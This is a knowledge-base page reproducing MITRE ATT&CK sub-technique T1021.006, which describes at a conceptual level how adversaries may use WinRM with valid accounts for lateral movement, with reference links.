T1021.006SubTechniquelateral-movementagent-callable

T1021.006Windows Remote Management

Sub-technique of T1021

Platforms: Windows

ATT&CK version: 14.1

What it is

Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to interact with remote systems using Windows Remote Management (WinRM). The adversary may then perform actions as the logged-on user. WinRM is the name of both a Windows service and a protocol that allows a user to interact with a remote system (e.g., run an executable, modify the Registry, modify services).(Citation: Microsoft WinRM) It may be called with the `winrm` command or by any number of programs such as PowerShell.(Citation: Jacobsen 2014) WinRM can be used as a method of remotely interacting with [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047).(Citation: MSDN WMI)

ATT&CK tactics· 1

Lateral Movement

References

  1. https://attack.mitre.org/techniques/T1021/006
  2. https://medium.com/threatpunter/detecting-lateral-movement-using-sysmon-and-splunk-318d3be141bc
  3. https://www.slideshare.net/kieranjacobsen/lateral-movement-with-power-shell-2
  4. https://msdn.microsoft.com/en-us/library/aa394582.aspx
  5. http://msdn.microsoft.com/en-us/library/aa384426
Sourced from MITRE ATT&CK Enterprise v14.1. Curated and contextualized for EU compliance use cases by Adam Lundqvist, Founder at SQUR.
T1021.006: Windows Remote Management | SQUR Knowledge Base